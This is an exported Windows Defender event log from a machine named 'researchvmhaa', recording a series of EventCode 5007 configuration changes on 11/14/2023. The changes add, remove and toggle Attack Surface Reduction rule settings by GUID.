OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x0
New value:
11/14/2023 09:44:31 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=497
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x1
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x0
11/14/2023 09:44:31 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=496
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x1
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x0
11/14/2023 09:41:42 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=495
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x1
11/14/2023 09:38:30 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=494
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x1
New value:
11/14/2023 09:38:30 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=493
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x1
11/14/2023 09:38:29 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=492
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x0
New value:
11/14/2023 09:38:29 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=491
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x1
11/14/2023 09:36:00 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=490
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x0
New value:
11/14/2023 09:36:00 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=489
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x0
11/14/2023 09:35:59 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=488
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 d1e49aac-8f56-4280-b9ba-993a6d77406c e6db77e5-3df2-4cf1-b95a-636979351e5b c1db55ab-c21a-4637-bb3f-a12568109d35 3B576869-A4EC-4529-8536-B80A7769E899 56a863a9-875e-4185-98a7-b882c64b5ce5 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 5BEB7EFE-FD9A-4556-801D-275E5FFC04CC 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c 26190899-1602-49e8-8b27-eb1d0a1ce869 D4F940AB-401B-4EFC-AADC-AD5F3C50688A 75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 D3E037E1-3EB8-44C8-A917-57927947596D 92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x1
New value:
11/14/2023 09:35:59 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=487
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x0
11/14/2023 09:35:55 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=486
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x6
New value:
11/14/2023 09:35:55 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=485
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x6
New value:
11/14/2023 09:35:55 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=484
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x6
New value:
11/14/2023 09:35:55 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=483
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x6
New value:
11/14/2023 09:35:55 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=482
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x6
New value:
11/14/2023 09:35:55 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=481
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x6
New value:
11/14/2023 09:35:55 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=480
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x6
New value:
11/14/2023 09:35:55 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=479
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x6
New value:
11/14/2023 09:35:55 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=478
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x6
New value:
11/14/2023 09:35:55 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=477
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x6
New value:
11/14/2023 09:35:55 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=476
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x6
New value:
11/14/2023 09:35:55 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=475
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x6
New value:
11/14/2023 09:35:55 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=474
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x6
New value:
11/14/2023 09:35:55 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=473
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x6
New value:
11/14/2023 09:35:55 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=472
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x6
New value:
11/14/2023 09:35:55 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=471
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x6
New value:
11/14/2023 09:35:55 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=470
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 d1e49aac-8f56-4280-b9ba-993a6d77406c e6db77e5-3df2-4cf1-b95a-636979351e5b c1db55ab-c21a-4637-bb3f-a12568109d35 3B576869-A4EC-4529-8536-B80A7769E899 56a863a9-875e-4185-98a7-b882c64b5ce5 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 5BEB7EFE-FD9A-4556-801D-275E5FFC04CC 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c 26190899-1602-49e8-8b27-eb1d0a1ce869 D4F940AB-401B-4EFC-AADC-AD5F3C50688A 75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 D3E037E1-3EB8-44C8-A917-57927947596D 92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x1
11/14/2023 09:17:39 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=468
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x6
11/14/2023 09:17:39 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=467
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x6
11/14/2023 09:17:39 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=466
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x6
11/14/2023 09:17:39 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=465
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x6
11/14/2023 09:17:39 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=464
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x6
11/14/2023 09:17:39 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=463
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x6
11/14/2023 09:17:39 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=462
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x6
11/14/2023 09:17:39 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=461
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x6
11/14/2023 09:17:39 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=460
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x6
11/14/2023 09:17:39 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=459
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x6
11/14/2023 09:17:39 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=458
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x6
11/14/2023 09:17:39 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=457
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x6
11/14/2023 09:17:39 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=456
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x6
11/14/2023 09:17:39 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=455
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x6
11/14/2023 09:17:39 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=454
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x6
11/14/2023 09:17:39 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=453
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x6
11/14/2023 09:00:13 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=452
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\ServiceStartStates = 0x1
New value: Default\ServiceStartStates = 0x0
11/14/2023 08:59:18 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=451
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
